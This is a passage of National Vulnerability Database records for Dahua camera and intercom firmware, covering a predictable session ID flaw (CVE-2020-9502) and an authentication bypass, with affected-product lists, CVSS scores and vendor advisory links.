   published: "2020-04-09T14:15:13.260",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-noinfo",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2020-05-13 16:15
Modified
2024-11-21 05:40
Severity ?
Summary
Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1CE773D-CA5F-483C-B20C-DAD30A590DDD",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "083AE420-CAF9-4A2A-8C76-79DD590FA191",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1EE24474-EF35-4475-99DD-4B54D6AF0B2D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A075994-60D1-40B7-9EF6-8048CBC18764",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A3C5893-E1D0-4E06-9F7F-058B657E4493",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F78D2E9E-9909-4130-A146-CA861F7DF341",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "19B57B9D-0729-48E0-892B-E39AE1F89AB4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "18CD222C-C95A-4D5E-A763-5D2F74EAEC04",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ECBC0BF-171E-49FD-B6AF-CC7B29D39FB7",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9E8CB654-0526-4E7A-8984-8350B39BB4DF",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "724F4B7D-C8C1-4914-B1D6-B4CB9B1F4093",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3AEBFC1D-9F25-4FDB-A191-D7D6C1C6E234",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D6E27D8-C608-49E7-8284-5196EDB428DB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A046C7EA-F954-4F36-9ED3-DBA84F1FB2D3",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B8887C8-C335-4EBB-BC7F-D4F8D8205DAE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCD8DCD2-5CEA-420F-860C-11B469D9FF8F",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F051A1A0-E841-42E7-92A3-E45E4017DCDE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F092AA97-7184-4499-BB83-D6204BD4621B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "FCB3A7FD-63A2-423C-912F-E2E5B4690CF1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "855B3C5F-CE9D-4FFA-B485-11A8D675F006",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "83B0FAFA-BEF4-4196-A4BC-4CFD6DCF4986",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D0E03DE-1BFA-43AD-9AC6-72A1A1545D4B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B51E9FED-4929-42CC-AA6F-BFF61E8F88C0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F20B6467-53DC-4DC6-BCC2-6B6B33ABD65D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB41CE1D-1A97-4549-A849-D06F78858CA3",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BFA91720-5AE4-48B6-A940-A4DBE650591D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D479D171-7F30-4D6B-8A49-0A3967103B94",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ACD4FD87-1D74-4895-AA89-D26541A55433",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7936F0A3-F6DF-47B2-898E-DBE68B369633",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D5136C6-2355-4782-BF9C-0874DC5B0CDA",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "195D7533-B2EF-4BC2-B6D6-0B141FB90090",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7180D6E1-6F7F-4EAD-BD51-02C029EFB034",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03D1AD58-447D-4D30-B9CF-48B5CB743C2B",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "AEC0287A-824B-46D0-84AB-54BEEF90E16B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5667962D-1A47-4D77-95A4-6B34F8863761",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hdbw1320e-w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1CBF6051-B1DF-4028-ADC1-CF3820C1CA71",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hdbw1320e-w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F221BD07-E754-4355-B031-A95147905815",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.",
      },
      {
         lang: "es",
         value: "Algunos productos Dahua con tiempo de Compilación antes de diciembre de 2019 presentan vulnerabilidades predecibles del ID de Sesión. Durante un acceso de usuario normal, un atacante puede usar el ID de Sesión previsto para construir un paquete de datos para atacar el dispositivo.",
      },
   ],
   id: "CVE-2020-9502",
   lastModified: "2024-11-21T05:40:47.147",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 7.5,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.4,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9.8,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2020-05-13T16:15:13.277",
   references: [
      {
         source: "cybersecurity@dahuatech.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
      },
   ],
   sourceIdentifier: "cybersecurity@dahuatech.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-330",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2021-09-15 22:15
Modified
2024-11-21 06:08
Severity ?
Summary
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.



{
   cisaActionDue: "2024-09-11",
   cisaExploitAdd: "2024-08-21",
   cisaRequiredAction: "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
   cisaVulnerabilityName: "Dahua IP Camera Authentication Bypass Vulnerability",
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "C0356805-3ECF-4C6F-B2BF-95D507736C44",
                     versionEndExcluding: "2.820.0000000.5.r.210705",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5AE9ACB0-4CB3-4CF5-A007-15EE977D782E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E0D17050-41CA-4808-8ED3-F332FD00B551",
                     versionEndExcluding: "2.800.0000000.29.r.210630",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8936A118-4AB5-4B09-A9FD-E624A68315BD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "04346BB7-74D1-46C4-B058-076B16C0209F",
                     versionEndExcluding: "2.820.0000000.18.r.210705",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F2838BDA-97FF-498E-BC81-955D31B9227A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "4BA2AB22-37B0-471F-B6E4-BB3F3A6FB817",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "88AD58DE-D990-4C98-853B-21B79CD07EEC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "17FADF4C-29F2-449A-B57E-59F2338D433C",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "428852DE-BDE3-4CE4-972C-821E88C7F930",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E306AAC-7BCD-4A76-8C7B-8399B54E12CE",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "61F87969-66DA-45EF-861C-3D3189388160",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "69712780-BA39-4B2E-810C-E9BCF6E213F1",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "69E7E0D4-7E9B-4580-B28A-898146DED548",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "41A67081-5051-47A0-A0EA-1C41A78F5C9A",
                     versionEndExcluding: "2.812.0000007.0.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "468FD434-642E-4613-B720-84254D9B9960",
                     versionEndExcluding: "2.630.0000000.6.r.210707",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "73B58CBF-EB67-4F02-BBAE-FFC329B8873C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "C24A62B1-EFFA-4D22-ACB3-A645B325C280",
                     versionEndExcluding: "2.630.0000000.10.r.210707",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2E314BF6-76B4-4ADB-B555-7DAF92F60485",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "C60703FA-F833-472C-84FC-2366409F484B",
                     versionEndExcluding: "2.630.0000000.12.r.210707",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F7EA0704-EC7A-457A-9AC1-A39B07229DFE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "EED64E60-F703-4116-9F34-7FDBD6906E33",
                     versionEndExcluding: "2.630.0000000.10.r.210701",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DABC76F-9824-43F3-B230-656F6C99CDA8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F49DC7A3-6FBB-4B52-848C-50EEAEFBF0B0",
                     versionEndIncluding: "2.630.0000000.7.r.210707",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D166CD0E-92CC-44FA-A520-FFFEBE2D7D50",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF2B9320-63F7-4076-B60B-674CBADC2235",
                     versionEndExcluding: "2.630.0000000.9.r.210706",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75A88A53-91D8-4019-95EB-F6FEFF469F9A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "4AC98964-DBDE-438C-A0E7-BF11D1BBC4B0",
                     versionEndExcluding: "4.300.0000004.0.r.210715",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "9438ADC0-C8F4-48E1-A905-9914A3AE715E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A3FFF94A-7F57-49D2-A6BA-5B58064C41C5",
                     versionEndExcluding: "4.300.0000003.0.r.210714",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B205125D-5A33-49B0-A2BA-BD833D107924",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "6F1138DD-7149-4191-BF6B-5176B8EF3A07",
                     versionEndExcluding: "4.500.0000002.0.r.210715",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "72039FDA-344D-4961-BB1B-E6F32EAFD7C2",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
